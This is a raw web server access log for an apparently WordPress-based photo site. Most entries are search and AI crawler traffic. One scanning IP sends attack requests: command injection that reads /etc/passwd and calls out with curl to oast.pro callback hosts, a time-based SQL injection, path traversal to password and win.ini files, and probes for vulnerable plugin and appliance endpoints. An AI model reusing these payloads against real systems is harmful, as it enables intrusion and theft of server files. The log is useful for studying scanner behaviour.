66.249.64.107 - - [18/Oct/2025:14:09:22 -0400] "GET /?products221728?kg=0000219105 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:14:09:21 -0400] "POST /wp-json/hc/v1/themehunk-import HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
174.138.112.39 - - [18/Oct/2025:14:09:51 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
157.20.32.210 - - [18/Oct/2025:14:10:08 -0400] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd HTTP/1.0" 403 1242 "-" "-"
157.20.32.210 - - [18/Oct/2025:14:10:10 -0400] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}d3pm34ikdbcl3g7iqchgmn6c8cab8qj5g.oast.pro HTTP/1.0" 403 1242 "-" "-"
157.20.32.210 - - [18/Oct/2025:14:10:11 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:10:22 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 404 10849 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0"
157.20.32.210 - - [18/Oct/2025:14:07:37 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:14:07:39 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:14:07:38 -0400] "GET /wp-login.php HTTP/1.1" 200 2344 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
20.171.207.254 - - [18/Oct/2025:14:08:34 -0400] "GET /products60884266?kg=0060141856 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:14:09:19 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
20.171.207.254 - - [18/Oct/2025:14:09:34 -0400] "GET /products60929526?kg=0060186566 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:14:09:38 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
18.171.59.255 - - [18/Oct/2025:14:09:50 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
164.90.241.135 - - [18/Oct/2025:14:09:50 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
46.101.70.221 - - [18/Oct/2025:14:09:50 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
185.61.153.107 - - [18/Oct/2025:14:10:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760811015.2726221084594726562500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:14:10:37 -0400] "GET /products60908570?kg=0060165864 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:14:10:39 -0400] "POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1" 404 10856 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0"
202.131.96.220 - - [18/Oct/2025:14:10:57 -0400] "POST /wp-login.php HTTP/1.1" 200 2173 "https://salhab360photos.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)"
66.249.64.105 - - [18/Oct/2025:14:11:49 -0400] "GET /products20872276?kg=0020617819 HTTP/1.1" 200 30284 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:14:12:18 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/619.23 (KHTML, like Gecko) Version/15.3.85 Safari/619.23"
157.20.32.210 - - [18/Oct/2025:14:12:19 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0"
20.171.207.254 - - [18/Oct/2025:14:12:44 -0400] "GET /products60912844?kg=0060170087 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:14:13:12 -0400] "POST /wp-json/notificationx/v1/analytics HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
202.131.96.220 - - [18/Oct/2025:14:10:53 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)"
157.20.32.210 - - [18/Oct/2025:14:11:47 -0400] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:14:11:48 -0400] "POST /wp-cron.php?doing_wp_cron=1760811108.6733770370483398437500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:14:11:43 -0400] "GET /products60937730?kg=0060194668 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:14:12:15 -0400] "GET /products4605074?kg=0004548996 HTTP/1.1" 200 29033 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:14:12:24 -0400] "POST /wp-cron.php?doing_wp_cron=1760811143.8672649860382080078125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:14:13:15 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.10"
185.61.153.107 - - [18/Oct/2025:14:13:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760811195.8724360466003417968750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:14:13:17 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
66.249.64.105 - - [18/Oct/2025:14:13:30 -0400] "GET /categories/12208736 HTTP/1.1" 200 30005 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:14:13:33 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=157824 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:13:39 -0400] "GET /?products1925032?kg=0001901637 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:13:44 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=164181 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:14:13:45 -0400] "GET /products60934974?kg=0060191946 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:14:13:53 -0400] "GET /products13977934?kg=0013807554 HTTP/1.1" 200 29847 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:13:54 -0400] "GET /categories/12150142 HTTP/1.1" 200 29281 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.105 - - [18/Oct/2025:14:14:20 -0400] "GET /?products13141698?kg=0012981516 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:14:24 -0400] "GET /?products14468044?kg=0014291687 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:14:29 -0400] "GET /?products6317444?kg=0006240483 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:14:34 -0400] "GET /categories/12150060 HTTP/1.1" 200 29013 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.105 - - [18/Oct/2025:14:14:38 -0400] "GET /products121877944?kg=0120391709 HTTP/1.1" 200 29009 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:14:14:51 -0400] "POST /wp-cron.php?doing_wp_cron=1760811291.7677519321441650390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.106 - - [18/Oct/2025:14:15:49 -0400] "GET /categories/12196918 HTTP/1.1" 200 29345 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
185.61.153.107 - - [18/Oct/2025:14:15:57 -0400] "POST /wp-cron.php?doing_wp_cron=1760811357.2687320709228515625000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:14:15:50 -0400] "GET /products60906680?kg=0060163997 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:14:16:11 -0400] "GET /?products7769258?kg=0007674592 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:14:16:11 -0400] "GET /products433776?kg=0000428569 HTTP/1.1" 200 29196 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:14:16:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760811379.2692840099334716796875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.105 - - [18/Oct/2025:14:16:35 -0400] "GET /products14151642?kg=0013979144 HTTP/1.1" 200 28709 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:14:16:52 -0400] "GET /products60929562?kg=0060186600 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:14:17:26 -0400] "POST /wp-cron.php?doing_wp_cron=1760811446.6680068969726562500000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
37.59.204.135 - - [18/Oct/2025:14:17:21 -0400] "GET /products214116268?kg=0211505175 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.64.106 - - [18/Oct/2025:14:13:27 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=1480129 HTTP/1.1" 200 28871 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:13:38 -0400] "GET /categories/12604208 HTTP/1.1" 200 29424 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:14:13:43 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 404 12315 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:14:13:48 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=32986 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:14:06 -0400] "GET /?products15240024?kg=0015054253 HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:14:14:11 -0400] "GET /?products4470562?kg=0004416124 HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:14:15 -0400] "GET /?products14467670?kg=0014291318 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:14:20 -0400] "GET /?products113109452?kg=0111730151 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:14:34 -0400] "GET /?products4735582?kg=0004677914 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:14:14:48 -0400] "GET /products60910580?kg=0060167851 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:14:15:51 -0400] "GET /products8815574?kg=0008708150 HTTP/1.1" 200 29874 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:14:16:15 -0400] "GET /products218202050?kg=0215541132 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:17:32 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
157.20.32.210 - - [18/Oct/2025:14:17:33 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:14:17:24 -0400] "GET /products167577778?kg=0165534228 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - cslu-windows-client [18/Oct/2025:14:17:32 -0400] "GET /cslu/v1/scheduler/jobs HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0"
157.20.32.210 - - [18/Oct/2025:14:17:32 -0400] "GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:14:17:38 -0400] "GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:17:42 -0400] "GET /xstoremgwt/cheetahImages?imageId=..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
66.249.64.105 - - [18/Oct/2025:14:17:54 -0400] "GET /products2562828?kg=0002531655 HTTP/1.1" 200 28869 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:14:17:48 -0400] "GET /products6807968?kg=0006725025 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:17:49 -0400] "GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:17:56 -0400] "GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:14:18:02 -0400] "GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
98.70.29.56 - - [18/Oct/2025:14:17:57 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
20.171.207.254 - - [18/Oct/2025:14:17:55 -0400] "GET /products60932022?kg=0060189030 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:14:18:14 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=91273 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:14:18:56 -0400] "GET /products60903204?kg=0060160563 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:14:19:36 -0400] "POST /wp-cron.php?doing_wp_cron=1760811576.4713060855865478515625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:14:19:33 -0400] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d3pm34ikdbcl3g7iqchgfh9etk6p66mp1.oast.pro HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:19:49 -0400] "POST /dana-ws/saml20.ws HTTP/1.1" 404 10846 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.2"
66.249.64.106 - - [18/Oct/2025:14:19:59 -0400] "GET /products4348710?kg=0004295758 HTTP/1.1" 200 28779 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:14:17:32 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:14:17:36 -0400] "GET /products107565500?kg=0106253807 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:14:17:46 -0400] "GET /?products7159342?kg=0007072114 HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:14:17:46 -0400] "GET /products8196018?kg=0008096148 HTTP/1.1" 200 30103 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:14:17:43 -0400] "GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
185.61.153.107 - - [18/Oct/2025:14:19:01 -0400] "POST /wp-cron.php?doing_wp_cron=1760811541.3724400997161865234375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.106 - - [18/Oct/2025:14:19:49 -0400] "GET /products7769168?kg=0007674505 HTTP/1.1" 200 30006 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:14:19:46 -0400] "GET /products42107214?kg=0041593794 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:14:20:08 -0400] "GET /?products1725690?kg=0001704728 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
